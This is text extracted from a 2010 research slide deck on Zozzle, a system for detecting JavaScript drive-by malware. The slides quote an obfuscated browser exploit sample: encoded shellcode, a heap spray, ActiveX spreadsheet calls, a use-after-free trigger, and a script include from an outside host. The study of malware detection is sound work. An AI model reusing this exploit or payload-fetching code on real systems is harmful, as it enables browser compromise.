1C%uA626%u42AE%u2CEC%uDCB9%uE019%uFF51%u1DD5%uE79B%u212E%uECE2%uAF1D%u1E04%u11D4%u9AB1%uB50A%u0464%uB564%uECCB%u8932%uE364%u64A4%uF3B5%u32EC%uEB64%uEC64%uB12A%u2DB2%uEFE7%u1B07%u1011%uBA10%uA3BD%uA0A2%uEFA1";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function ek13()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return true;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window.onerror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ek13;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scode1 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>unescape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scode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+ "%u7468%u7074%u2F3A%u612F%u7472%u6369%u656C%u2E73%u6F6B%u6172%u616A%u632E%u6D6F%u732F%u6F68%u6377%u7461%u702E%u7068%u633F%u6469%u383D%u2637%u6E63%u4D3D%u7375%u6369%u252B%u3632%u4D2B%u3350%u733F%u453D%u7159%u6735%u4337%u2667%u6469%u313D%u0032");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try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sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ActiveXObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("OWC10.Spreadsheet"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if (!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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ActiveXObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("OWC11.Spreadsheet");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if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document.write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("&lt;script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src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=http://articles.koraja.com/showcat.php?cid=87&amp;cn=Music+%26+MP3?s=EYq5g7Cg&amp;id=4&gt;&lt;\/script&gt;");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array = new Array();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0x81000 - (scode1.length * 2);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bigblock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unescape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("%u0b0c%u0b0C");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while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bigblock.length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&lt;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/ 2)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bigblock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+=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bigblock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bigblock.substring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(0,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/ 2);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sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>delete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bigblock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4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> for (i = 0; i &lt; 0x99 * 2; i++) {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            array[i] = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> + scode1;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        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e = new Array();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e.push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e.push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e.push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(0);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e.push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(window);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for (i = 0; i &lt;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e.length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 i++)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for (j = 0; j &lt; 10; j++)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try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obj.Evaluate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(e[i]);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} catch (e) {}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window.status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e[3] + "";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for (j = 0; j &lt; 10; j++)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try {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obj.msDataSourceObject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(e[3]);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} catch (e) {}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}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 catch (e) {}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scode2 =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unescape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scode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+ "%u7468%u7074%u2F3A%u612F%u7472%u6369%u656C%u2E73%u6F6B%u6172%u616A%u632E%u6D6F%u732F%u6F68%u6377%u7461%u702E%u7068%u633F%u6469%u383D%u2637%u6E63%u4D3D%u7375%u6369%u252B%u3632%u4D2B%u3350%u733F%u453D%u7159%u6735%u4337%u2667%u6469%u313D%u0033");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o84r = new Array();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m79k = 0x100000 - (scode2.length * 2 + 0x01020);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d15t =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unescape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("%u0C0C%u0C0C");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while (d15t.length &lt; m79k / 2) d15t += d15t;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f20b = d15t.substring(0, m79k / 2);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delete d15t;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(v95l = 0; v95l &lt; 0xC0; v95l++) o84r[v95l] = f20b + scode2;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CollectGarbage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();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m77k =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unescape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("%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA");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e89f = new Array();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e45n = 0; e45n &lt; 1000; e45n++) e89f.push(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document.createElement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("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"));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r27n =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document.createElement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("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tbody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");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r27n.click;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o88j = r27n.cloneNode();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r27n.clearAttributes();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r27n = null;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CollectGarbage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();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e45n = 0; e45n &lt; e89f.length; e45n++) e89f[e45n].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src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m77k;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o88j.click;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document.write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("&lt;/div&gt;");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mple-exploi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6626B-2CA8-4A5D-B1ED-3706ED98910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10593</TotalTime>
  <Words>4315</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>522</Paragraphs>
  <Slides>29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Zozzle: Finding Malware  on a Web Scale</vt:lpstr>
      <vt:lpstr>Blacklisting Malware in Search Results</vt:lpstr>
      <vt:lpstr>Drive-by Malware Detection Landscape</vt:lpstr>
      <vt:lpstr>How to Recognize JavaScript Malware?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Encode This Intuition?</vt:lpstr>
      <vt:lpstr>Plan</vt:lpstr>
      <vt:lpstr>Obfuscation</vt:lpstr>
      <vt:lpstr>Plan (revised)</vt:lpstr>
      <vt:lpstr>Obfuscated? Yes. Malicious, no.</vt:lpstr>
      <vt:lpstr>Highly Obfuscated != Malicious</vt:lpstr>
      <vt:lpstr>Plan (revised and improved)</vt:lpstr>
      <vt:lpstr>Runtime Deobfuscation via Code Unfolding)</vt:lpstr>
      <vt:lpstr>Zozzle Training &amp; Application</vt:lpstr>
      <vt:lpstr>Hierarchical Feature Extraction</vt:lpstr>
      <vt:lpstr>Naïve Bayes Classification</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Contributions of Zozzle</vt:lpstr>
      <vt:lpstr>Evaluation</vt:lpstr>
      <vt:lpstr>Features &amp; Throughput</vt:lpstr>
      <vt:lpstr>False Positives &amp; False Negatives</vt:lpstr>
      <vt:lpstr>Limitations of Zozzle</vt:lpstr>
      <vt:lpstr>What’s Next: Rozzle</vt:lpstr>
      <vt:lpstr>Zozzle: Detection on a Web Scale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 Zorn</dc:creator>
  <cp:keywords>Fall 2010 presentation</cp:keywords>
  <cp:lastModifiedBy>Ben Livshits</cp:lastModifiedBy>
  <cp:revision>396</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2009-08-06T17:30:43Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2011-09-01T22:35:54Z</dcterms:modified>
</cp:coreProperties>
</file>